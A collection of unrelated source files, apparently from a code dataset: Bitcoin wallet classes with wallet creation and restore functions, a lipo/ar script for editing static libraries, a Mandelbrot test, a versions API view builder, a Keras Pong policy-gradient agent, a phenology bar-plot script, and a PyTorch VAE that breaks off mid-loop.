limit = self.gap_limit_for_change if is_change else self.gap_limit
if i < limit:
return False
slice_start = max(0, i - limit)
slice_stop = max(0, i)
if is_change:
prev_addresses = self.get_change_addresses(slice_start=slice_start, slice_stop=slice_stop)
else:
prev_addresses = self.get_receiving_addresses(slice_start=slice_start, slice_stop=slice_stop)
for addr in prev_addresses:
if self.db.get_addr_history(addr):
return False
return True
def get_address_index(self, address) -> Optional[Sequence[int]]:
return self.db.get_address_index(address) or self._ephemeral_addr_to_addr_index.get(address)
def _learn_derivation_path_for_address_from_txinout(self, txinout, address):
for ks in self.get_keystores():
pubkey, der_suffix = ks.find_my_pubkey_in_txinout(txinout, only_der_suffix=True)
if der_suffix is not None:
self._ephemeral_addr_to_addr_index[address] = list(der_suffix)
return True
return False
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage, *, config):
Deterministic_Wallet.__init__(self, storage, config=config)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkeys = self.derive_pubkeys(*sequence)
return pubkeys[0]
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bip32.xpub_type(self.keystore.xpub)
        except Exception:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return [self.keystore.derive_pubkey(c, i).hex()]
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkeys):
pubkey = pubkeys[0]
return bitcoin.pubkey_to_address(self.txin_type, pubkey)
class Mobile_Wallet(Imported_Wallet):
wallet_type = 'mobile'
def __init__(self, storage: WalletStorage, *, config: SimpleConfig):
Imported_Wallet.__init__(self, storage, config=config)
self.use_change = False
self.gap_limit = 10
def can_import_address(self):
return False
def can_delete_address(self):
return False
def synchronize(self):
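        # derive up to gap_limit private keys along the fixed [0, i] path and import them as
        # ordinary keys; change addresses are not used (use_change is False)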
keys = []
addr_count = len(self.get_addresses())
for i in range(0, self.gap_limit - addr_count):
secret, compressed = self.keystore.derive_privkey([0, addr_count + i], None)
keys.append(serialize_privkey(secret, compressed, 'p2pkh', True))
self.import_private_keys(keys, None, write_to_disk=False)
class Qt_Core_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'qtcore'
def __init__(self, storage: WalletStorage, *, config: SimpleConfig):
Simple_Deterministic_Wallet.__init__(self, storage, config=config)
self.gap_limit = 100
self.gap_limit_for_change = 0
self.use_change = False
def synchronize(self):
        # don't create change addresses
# since core wallet doesn't distinguish address type from derivation path
with self.lock:
self.synchronize_sequence(False)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
def __init__(self, storage, *, config):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage, config=config)
def get_public_keys(self, address):
return [pk.hex() for pk in self.get_public_keys_with_deriv_info(address)]
def pubkeys_to_address(self, pubkeys):
redeem_script = self.pubkeys_to_scriptcode(pubkeys)
return bitcoin.redeem_script_to_address(self.txin_type, redeem_script)
def pubkeys_to_scriptcode(self, pubkeys: Sequence[str]) -> str:
return transaction.multisig_script(sorted(pubkeys), self.m)
def get_redeem_script(self, address):
txin_type = self.get_txin_type(address)
pubkeys = self.get_public_keys(address)
scriptcode = self.pubkeys_to_scriptcode(pubkeys)
if txin_type == 'p2sh':
return scriptcode
elif txin_type == 'p2wsh-p2sh':
return bitcoin.p2wsh_nested_script(scriptcode)
elif txin_type == 'p2wsh':
return None
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def get_witness_script(self, address):
txin_type = self.get_txin_type(address)
pubkeys = self.get_public_keys(address)
scriptcode = self.pubkeys_to_scriptcode(pubkeys)
if txin_type == 'p2sh':
return None
elif txin_type in ('p2wsh-p2sh', 'p2wsh'):
return scriptcode
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i).hex() for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bip32.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
def check_password(self, password):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
# multisig wallets are not offered hw device encryption
return StorageEncryptionVersion.USER_PASSWORD
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
return all([k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
wallet_types = ['standard', 'multisig', 'imported', 'mobile', 'qtcore']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported': Imported_Wallet,
'mobile': Mobile_Wallet,
'qtcore': Qt_Core_Wallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
# former WalletFactory
class Wallet(object):
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage: WalletStorage, *, config: SimpleConfig):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage, config=config)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise WalletFileException("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config: SimpleConfig, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
seed = Mnemonic('en').make_seed(seed_type)
k = keystore.from_seed(seed, passphrase)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage, config=config)
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
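# Illustrative usage sketch (comment only; `config` is assumed to be an existing
# SimpleConfig instance and the target path must not exist yet):
#
#   d = create_new_wallet(path='/tmp/wallet_1', config=config, password='pw')
#   print(d['seed'])            # back up the seed before funding the wallet
#   d['wallet'].get_addresses() # addresses generated by the initial synchronize()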
def restore_wallet_from_text(text, *, path, config: SimpleConfig,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = Imported_Wallet(storage, config=config)
addresses = text.split()
good_inputs, bad_inputs = wallet.import_addresses(addresses, write_to_disk=False)
# FIXME tell user about bad_inputs
if not good_inputs:
raise Exception("None of the given addresses can be imported")
elif keystore.is_private_key_list(text, allow_spaces_inside_key=False):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = Imported_Wallet(storage, config=config)
keys = keystore.get_private_keys(text, allow_spaces_inside_key=False)
good_inputs, bad_inputs = wallet.import_private_keys(keys, None, write_to_disk=False)
# FIXME tell user about bad_inputs
if not good_inputs:
raise Exception("None of the given privkeys can be imported")
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase)
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage, config=config)
assert not storage.file_exists(), "file was created too soon! plaintext keys might have been written to disk"
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
the-stack_106_19068
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import sys
import tempfile
import os
LIPO = "lipo"
IOS_LIPO="/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/lipo"
if os.path.exists(IOS_LIPO):
LIPO = IOS_LIPO
def exitFailure(msg):
print("Error: " + msg)
exit(1)
def listArchs(archive):
try:
out = subprocess.check_output([LIPO, "-info", archive]).decode("utf-8")
except:
out = ""
xs = out.split(":")
if (len(xs)) != 3:
exitFailure("invalid lipo -info output")
return xs[2].strip().split()
def extractArch(archive, arch, path):
name = arch + "-" + os.path.basename(archive)
fpath = os.path.join(path, name)
try:
t = subprocess.check_call([LIPO, "-thin", arch, archive, "-output", fpath])
except:
t = 1
if t != 0:
return ""
return fpath
def extractObjs(archive, path):
try:
t = subprocess.check_call(["ar", "-x", archive], cwd=path)
except:
t = 1
if t != 0:
return False
return True
def archiveObjs(archive, path):
vext = lambda x: x[-2:] == ".o" or x[-3:] == ".o2"
    files = list(filter(vext, os.listdir(path)))  # materialize the filter so it can be concatenated below
try:
t = subprocess.check_call(["libtool", "-static", "-o", archive] + files, cwd=path)
except:
t = 1
if t != 0:
return False
return True
def mergeArch(archives, outpath):
if not archives:
return
try:
t = subprocess.check_call([LIPO, "-create"] + archives + ["-output", outpath])
except:
t = 1
if t != 0:
return False
return True
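# Overall flow implemented below (descriptive comment only): list the
# architectures in the (possibly fat) archive, thin each one out with lipo,
# unpack its objects with ar, rename or delete the requested object file,
# repack the thin archive with libtool, and finally lipo -create the thinned
# archives back into the original universal file.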
if len(sys.argv) < 3:
print("Usage: {} archive objectname".format(os.path.basename(sys.argv[0])))
exit(1)
archive = sys.argv[1]
ofname = sys.argv[2]
remove = False
if (len(sys.argv) > 3):
remove = bool(int(sys.argv[3]))
root,ext = os.path.splitext(ofname)
nfname = root + "_" + ext
altofname = root + ".o2"
altnfname = root + "_.o2"
archs = listArchs(archive)
isFat = len(archs) > 1
# Create tmp dir
tdir = tempfile.mkdtemp()
marchives = []
for arch in archs:
# Extract arch from universal binary
thinar = archive
if isFat:
thinar = extractArch(archive, arch, tdir)
if not thinar:
print("Cannot extract arch " + arch)
continue
# Create tmp dir for extracted objects
arname = os.path.basename(thinar)
xdir = os.path.join(tdir, arname) + ".dir"
os.mkdir(xdir)
# Extract objects
if not extractObjs(thinar, xdir):
print("Cannot extract objects for " + arch)
continue
ofpath = os.path.join(xdir, ofname)
if remove:
os.unlink(ofpath)
else:
# Rename object
nfpath = os.path.join(xdir, nfname)
if not os.path.exists(ofpath):
# Try alternative extension
ofpath = os.path.join(xdir, altofname)
nfpath = os.path.join(xdir, altnfname)
if not os.path.exists(ofpath):
print("Cannot find object {} for arch {}".format(ofname, arch))
continue
os.rename(ofpath, nfpath)
# Archive objects
archiveObjs(thinar, xdir)
# Add archive to modified archive list
marchives.append(thinar)
if isFat:
# Merge all subarch into original file
if not mergeArch(marchives, archive):
exitFailure("Cannot update original file")
|
the-stack_106_19070
|
import sys
lines = sys.stdin.readlines()
i = 1
for line in lines:
line = list(map(float, line.strip().split()))
x = line[0]
y = line[1]
r = int(line[2])
count = 1
while count < r and x*x+y*y < 4:
tmp = x
x = x*x-y*y+line[0]
y=2*tmp*y+line[1]
count+=1
if x*x +y*y >= 4:
print(f"CASE {i}: OUT")
else:
print(f"CASE {i}: IN")
i+=1
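# Example session (illustrative only): with stdin lines "0 0 100" and "2 2 100"
# the script iterates z <- z^2 + c for each c = x + yi and prints
# "CASE 1: IN" (the origin never escapes |z|^2 >= 4) followed by
# "CASE 2: OUT" (2+2i escapes immediately), i.e. a per-line Mandelbrot
# membership test with a fixed iteration budget r.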
|
the-stack_106_19073
|
# Copyright 2020 Inspur
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import os
from oslo_config import cfg
versions_opts = [
cfg.StrOpt('public_endpoint', default=None,
help="Public url to use for versions endpoint. The default "
"is None, which will use the request's host_url "
"attribute to populate the URL base. If Venus is "
"operating behind a proxy, you will want to change "
"this to represent the proxy's URL."),
]
CONF = cfg.CONF
CONF.register_opts(versions_opts)
def get_view_builder(req):
base_url = CONF.public_endpoint or req.application_url
return ViewBuilder(base_url)
class ViewBuilder(object):
def __init__(self, base_url):
"""Initialize ViewBuilder.
:param base_url: url of the root wsgi application
"""
self.base_url = base_url
def build_choices(self, VERSIONS, req):
version_objs = []
for version in VERSIONS:
version = VERSIONS[version]
version_objs.append({
"id": version['id'],
"status": version['status'],
"links": [{"rel": "self",
"href": self.generate_href(version['id'],
req.path), }, ],
"media-types": version['media-types'], })
return dict(choices=version_objs)
def build_versions(self, versions):
version_objs = []
for version in sorted(versions.keys()):
version = versions[version]
version_objs.append({
"id": version['id'],
"status": version['status'],
"updated": version['updated'],
"links": self._build_links(version), })
return dict(versions=version_objs)
def build_version(self, version):
reval = copy.deepcopy(version)
reval['links'].insert(0, {
"rel": "self",
"href": self.base_url.rstrip('/') + '/', })
return dict(version=reval)
def _build_links(self, version_data):
"""Generate a container of links that refer to the provided version."""
href = self.generate_href(version_data['id'])
links = [{'rel': 'self',
'href': href, }, ]
return links
def generate_href(self, version, path=None):
"""Create an url that refers to a specific version_number."""
if version.find('v1.') == 0:
version_number = 'v1'
else:
raise Exception("Error version of %s" % version)
if path:
path = path.strip('/')
return os.path.join(self.base_url, version_number, path)
else:
return os.path.join(self.base_url, version_number) + '/'
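# Illustrative output (comment only, with assumed data): if base_url is
# "http://venus/" then generate_href('v1.0', 'logs') returns
# "http://venus/v1/logs", and build_version() prepends a self link whose
# href is simply "http://venus/".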
|
the-stack_106_19074
|
from agent_dir.agent import Agent
import scipy.misc
import numpy as np
import os
import keras
import tensorflow as tf
from keras.models import Sequential,load_model
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.optimizers import Adam, Adamax, RMSprop
from keras import backend as K
from keras.backend.tensorflow_backend import set_session
tf.reset_default_graph()
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 1.0
set_session(tf.Session(config=config))
# Reference: https://github.com/mkturkcan/Keras-Pong/blob/master/keras_pong.py
def discount_rewards(r):
gamma=0.99
discounted_r = np.zeros_like(r)
running_add = 0
for t in reversed(range(0, r.size)):
if r[t] != 0: running_add = 0
running_add = running_add * gamma + r[t]
discounted_r[t] = running_add
return discounted_r
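# Worked example (comment only): with gamma = 0.99,
# discount_rewards(np.array([0., 0., 1.])) -> [0.9801, 0.99, 1.0].
# The running sum is reset whenever a non-zero reward appears, so each
# Pong rally is discounted independently of the previous one.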
# Sum up losses instead of mean
def categorical_crossentropy(target, output):
_epsilon = tf.convert_to_tensor(10e-8, dtype=output.dtype.base_dtype)
output = tf.clip_by_value(output, _epsilon, 1. - _epsilon)
return tf.reduce_sum(- tf.reduce_sum(target * tf.log(output),axis=len(output.get_shape()) - 1),axis=-1)
def prepro(o,image_size=[80,80]):
"""
Call this function to preprocess RGB image to grayscale image if necessary
This preprocessing code is from
https://github.com/hiwonjoon/tf-a3c-gpu/blob/master/async_agent.py
Input:
RGB image: np.array
RGB screen of game, shape: (210, 160, 3)
Default return: np.array
Grayscale image, shape: (80, 80, 1)
"""
y = 0.2126 * o[:, :, 0] + 0.7152 * o[:, :, 1] + 0.0722 * o[:, :, 2]
y = y.astype(np.uint8)
resized = scipy.misc.imresize(y, image_size)
return np.expand_dims(resized.astype(np.float32),axis=2)
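# Note (comment only): prepro() turns a (210, 160, 3) Atari RGB frame into an
# (80, 80, 1) float32 grayscale array; the agent below feeds the network the
# difference of two consecutive preprocessed frames so that ball and paddle
# motion is visible to a single forward pass.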
class Agent_PG(Agent):
def __init__(self, env, args):
super(Agent_PG,self).__init__(env)
self.log_path = args.save_summary_path+'pg.log'
self.model_path = args.save_network_path+'pong_model_checkpoint.h5'
self.env = env
self.actions_avialbe = env.action_space.n
if args.test_pg:
self.model = load_model(args.test_pg_model_path)
else:
self.learning_rate = args.learning_rate
# Model for Breakout #
model = Sequential()
model.add(Conv2D(32,kernel_size=(9, 9),strides=4,activation='relu',input_shape=(80,80,1), init='he_uniform'))
model.add(Conv2D(16,kernel_size=(9, 9),strides=2,activation='relu', init='he_uniform'))
model.add(Flatten())
model.add(Dense(self.actions_avialbe,activation='softmax'))
opt = Adam(lr=self.learning_rate)
model.compile(loss=categorical_crossentropy, optimizer=opt)
self.model = model
def init_game_setting(self):
self.prev_x = None
def train(self):
# Init
log = open(self.log_path,'w')
log.write('reward,avg_reward\n')
batch_size = 1
frames, prob_actions, dlogps, drs =[], [], [], []
tr_x, tr_y = [],[]
avg_reward = []
reward_sum = 0
ep_number = 0
prev_x = None
observation = self.env.reset()
# Training progress
while True:
# Get observe
cur_x = prepro(observation)
# Consider frame difference and take action.
x = cur_x - prev_x if prev_x is not None else np.zeros(cur_x.shape)
prev_x = cur_x
aprob = self.model.predict(x.reshape((1,80,80,1)), batch_size=1).flatten()
frames.append(x)
prob_actions.append(aprob)
action = np.random.choice(self.actions_avialbe, 1, p=aprob.reshape((self.actions_avialbe)))[0]
y = np.zeros([self.actions_avialbe])
y[action] = 1
observation, reward, done, info = self.env.step(action)
reward_sum += reward
drs.append(reward)
dlogps.append(np.array(y).astype('float32') - aprob)
if done:
ep_number +=1
ep_x = np.vstack(frames)
ep_dlogp = np.vstack(dlogps)
ep_reward = np.vstack(drs)
# Discount and normalize rewards
discounted_ep_reward = discount_rewards(ep_reward)
discounted_ep_reward -= np.mean(discounted_ep_reward)
discounted_ep_reward /= np.std(discounted_ep_reward)
ep_dlogp *= discounted_ep_reward
# Store current episode into training batch
tr_x.append(ep_x)
tr_y.append(ep_dlogp)
frames, dlogps, drs =[], [], []
if ep_number % batch_size == 0:
input_tr_y = prob_actions + self.learning_rate * np.squeeze(np.vstack(tr_y))
self.model.train_on_batch(np.vstack(tr_x).reshape(-1,80,80,1), input_tr_y)
tr_x,tr_y,prob_actions = [],[],[]
# Checkpoint
os.remove(self.model_path) if os.path.exists(self.model_path) else None
self.model.save(self.model_path)
avg_reward.append(float(reward_sum))
if len(avg_reward)>30: avg_reward.pop(0)
                print('Episode {:} reward {:.2f}, Last 30ep Avg. rewards {:.2f}.'.format(ep_number,reward_sum,np.mean(avg_reward)))
print('{:.4f},{:.4f}'.format(reward_sum,np.mean(avg_reward)),end='\n',file=log,flush=True)
reward_sum = 0
observation = self.env.reset()
prev_x = None
def make_action(self, observation, test=True):
"""
Input:
observation: np.array
current RGB screen of game, shape: (210, 160, 3)
Return:
action: int
the predicted action from trained model
"""
cur_x = prepro(observation)
x = cur_x - self.prev_x if self.prev_x is not None else np.zeros(cur_x.shape)
self.prev_x = cur_x
aprob = self.model.predict(x.reshape((1,80,80,1)), batch_size=1).flatten()
return np.argmax(aprob)
|
the-stack_106_19075
|
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 26 14:58:57 2019
@author: Administrator
MCD12 LandCover Types:
DBF == 4:DBF,5:MF
EBF == 2:EBF
NF == 1:ENF,3:DNF
CRO == 12: CRO, 14: CRO&NV
GRA == 10: GRA
SHR == 6:CSH, 7:OSH
SAV == 8:WSA, 9:SAV
"""
import numpy as np
import matplotlib.pyplot as plt
import os
from osgeo import gdal_array
import matplotlib.gridspec as gridspec
import warnings
warnings.filterwarnings('ignore')
in_file_path = r"F:\Chlorophyll_Fluorescence\Process\Europe\Step14.Boreal_Map"
landcover_file = r"F:\Chlorophyll_Fluorescence\Process\Europe\Step14.Boreal_Map\MOD12_LandUse_N.tif"
plot_path = r"F:\Chlorophyll_Fluorescence\Process\Europe\Step4.Table\Polygon\4.11.Box_Plot_His"
Products = ["TROPOMI_SC","TROPOMI_SR","NIRv","EVI"]
LandCover = ["DBF", "NF", "SAV", "GRA", "SHR", "CRO"]
LC_CODE = [[4,5],[1,3],[8,9],[10],[6,7],[12,14]]
Metrics = [1,3,5]  # 1, 3 and 5 stand for the SOS, EOS and LOS metrics respectively
Name = ["DBF", "NF", "SAV", "GRA", "SHR", "CRO"]
nrows = 2
ncols = 3
figure_scale_row = nrows * 2.0
figure_scale_col = ncols * 2.0
fig = plt.figure(figsize=(figure_scale_col, figure_scale_row))#, sharey=True)
gs = gridspec.GridSpec(nrows, ncols, wspace=0.1, hspace=0.6)
fs = 5 # fontsize
x_labels = ['SOS', 'EOS', 'GSL'] #'Tropomi_SR', 'MODIS', 'OCO-2']
y_lables = [0, 100, 200, 300]
min_y = 0
max_y = 365
ny = 4  # number of y-axis ticks
bar_width = 0.15  # width of each bar
capsize = 1.2  # error-bar parameter 1: cap size
capthick = 0.8  # error-bar parameter 2: cap thickness
elinewidth = 0.8  # error-bar parameter 3: line width
linewidth = 1.0  # frame (spine) line width
ftsize = 10  # font size
ftfamily = "Times New Roman"
axlength = 2.0  # axis tick length
axwidth = 1.2  # axis tick width
legendcols = 5  # number of legend entries per row
for i in range(len(LandCover)):
mean = []
err = []
for j in range(len(Metrics)):
lc_array = gdal_array.LoadFile(landcover_file)
SIF_SC_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.SC_GSL_Mask/SC_{0}.tif".format(Metrics[j])))
SIF_SR_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.SR_GSL_Mask/SR_{0}.tif".format(Metrics[j])))
dcSIF_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.dcSIF_GSL_Mask/dcSIF_{0}.tif".format(Metrics[j])))
EVI_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.EVI_GSL_Mask/EVI_{0}.tif".format(Metrics[j])))
NIRv_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.NIRv_GSL_Mask/NIRv_{0}.tif".format(Metrics[j])))
SIF_SC = []
SIF_SR = []
dcSIF = []
NIRv = []
EVI = []
for m in range(len(lc_array)):
for n in range(len(lc_array[0])):
if lc_array[m,n] in LC_CODE[i]:
if abs(SIF_SC_array[m,n]) < 999:
SIF_SC.append(SIF_SC_array[m,n])
if abs(SIF_SR_array[m,n]) < 999:
SIF_SR.append(SIF_SR_array[m,n])
if abs(dcSIF_array[m,n]) < 999:
dcSIF.append(dcSIF_array[m,n])
if abs(NIRv_array[m,n]) < 999:
NIRv.append(NIRv_array[m,n])
if abs(EVI_array[m,n]) < 999:
EVI.append(EVI_array[m,n])
mean.append([np.nanmean(SIF_SC), np.nanmean(SIF_SR), np.nanmean(dcSIF), np.nanmean(NIRv), np.nanmean(EVI)])
err.append([np.nanstd(SIF_SC), np.nanstd(SIF_SR), np.nanstd(dcSIF), np.nanstd(NIRv), np.nanstd(EVI)])
mean = np.array(mean)
err = np.array(err)
    # draw the grouped bar chart
x = np.arange(int(len(x_labels)))
col = int(i % ncols)
row = int(i / ncols)
axes = fig.add_subplot(gs[row, col])
SIF_SC = axes.bar(x + 0 * bar_width, mean[:,0], bar_width, yerr = err[:,0], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="olivedrab", label = "SIF$_T$$_R$$_O$$_P$$_O$$_M$$_I$$_\_$$_t$$_o$$_t$$_a$$_l$$_-$$_S$$_C$", align="center", alpha=1)
SIF_SR = axes.bar(x + 1 * bar_width, mean[:,1], bar_width, yerr = err[:,1], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="yellowgreen", label = "SIF$_T$$_R$$_O$$_P$$_O$$_M$$_I$$_\_$$_t$$_o$$_t$$_a$$_l$$_-$$_S$$_R$", align="center", alpha=1)
dcSIF = axes.bar(x + 2 * bar_width, mean[:,2], bar_width, yerr = err[:,2], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="forestgreen", label = "SIF$_T$$_R$$_O$$_P$$_O$$_M$$_I$$_\_$$_O$$_b$$_s$", align="center", alpha=1)
NIRv = axes.bar(x + 3 * bar_width, mean[:,3], bar_width, yerr = err[:,3], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="darkgoldenrod", label = "NIRv", align="center", alpha=1)
EVI = axes.bar(x + 4 * bar_width, mean[:,4], bar_width, yerr = err[:,4], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="gold", label = "EVI", align="center", alpha=1)
axes.set_title("({0}) {1}".format(chr(97+i),Name[i]), fontsize = ftsize/1.2, family = ftfamily)
axes.set_xticks(x + 2 * bar_width)
axes.set_xticklabels(x_labels, fontsize = fs, family = ftfamily)
axes.set_ylim(min_y, max_y)
axes.spines['left'].set_linewidth(linewidth)
axes.spines['right'].set_linewidth(linewidth)
axes.spines['top'].set_linewidth(linewidth)
axes.spines['bottom'].set_linewidth(linewidth)
axes.tick_params(axis='both', length = axlength, width = axwidth, labelsize = ftsize/1.5)
if col == 0:
axes.set_ylabel('Day of Year (days)', fontsize = ftsize/1.6, family=ftfamily)
axes.set_yticks(np.linspace(min_y, max_y - 65, ny))
axes.set_yticklabels(y_lables, fontsize = fs + 2, family=ftfamily)
else:
axes.yaxis.set_visible(False)
axes.set_xlabel('Phenological Metrics', fontsize = ftsize/1.5, family=ftfamily)
handles = [SIF_SC, SIF_SR, dcSIF, NIRv, EVI]
labels = ['SIF$_\mathdefault{total-SC}$',\
'SIF$_\mathdefault{total-SR}$',\
'SIF$_\mathdefault{Obs}$',\
'NIR$_\mathdefault{V}$','EVI']
"""
if i == 0:
axes.legend(handles, labels, loc ='upper left', fancybox = False, shadow = False,frameon = False,
ncol = legendcols, prop={'family':ftfamily, 'size':ftsize/3})
"""
fig.legend(handles, labels, loc ='lower center', fancybox = False, shadow = False,frameon = False,
ncol = legendcols, handletextpad = 0.2, columnspacing = 1.5, prop={'family':"Times New Roman", 'size':ftsize/1.3})
fig.tight_layout()
fig.subplots_adjust(left = None, right = None, bottom = 0.15)
Plot_path = os.path.join(plot_path, "Rs2-Global.jpg")
plt.show()
fig.savefig(Plot_path, dpi=600, quality=100,bbox_inches='tight')
|
the-stack_106_19076
|
import torch
import torch.nn.functional as nn
import torch.autograd as autograd
import torch.optim as optim
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
from torch.autograd import Variable
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True)
mb_size = 64
Z_dim = 100
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
h_dim = 128
c = 0
lr = 1e-3
def xavier_init(size):
in_dim = size[0]
xavier_stddev = 1. / np.sqrt(in_dim / 2.)
return Variable(torch.randn(*size) * xavier_stddev, requires_grad=True)
# =============================== Q(z|X) ======================================
Wxh = xavier_init(size=[X_dim, h_dim])
bxh = Variable(torch.zeros(h_dim), requires_grad=True)
Whz_mu = xavier_init(size=[h_dim, Z_dim])
bhz_mu = Variable(torch.zeros(Z_dim), requires_grad=True)
Whz_var = xavier_init(size=[h_dim, Z_dim])
bhz_var = Variable(torch.zeros(Z_dim), requires_grad=True)
def Q(X):
h = nn.relu(X @ Wxh + bxh.repeat(X.size(0), 1))
z_mu = h @ Whz_mu + bhz_mu.repeat(h.size(0), 1)
z_var = h @ Whz_var + bhz_var.repeat(h.size(0), 1)
return z_mu, z_var
def sample_z(mu, log_var):
eps = Variable(torch.randn(mb_size, Z_dim))
return mu + torch.exp(log_var / 2) * eps
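# Reparameterization trick (comment only): rather than sampling
# z ~ N(mu, sigma^2) directly, sample_z() draws eps ~ N(0, I) and returns
# mu + exp(log_var / 2) * eps, which keeps the sampling step differentiable
# with respect to mu and log_var so the encoder can be trained by backprop.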
# =============================== P(X|z) ======================================
Wzh = xavier_init(size=[Z_dim, h_dim])
bzh = Variable(torch.zeros(h_dim), requires_grad=True)
Whx = xavier_init(size=[h_dim, X_dim])
bhx = Variable(torch.zeros(X_dim), requires_grad=True)
def P(z):
h = nn.relu(z @ Wzh + bzh.repeat(z.size(0), 1))
X = nn.sigmoid(h @ Whx + bhx.repeat(h.size(0), 1))
return X
# =============================== TRAINING ====================================
params = [Wxh, bxh, Whz_mu, bhz_mu, Whz_var, bhz_var,
Wzh, bzh, Whx, bhx]
solver = optim.Adam(params, lr=lr)
for it in range(100000):
X, _ = mnist.train.next_batch(mb_size)
X = Variable(torch.from_numpy(X))
# Forward
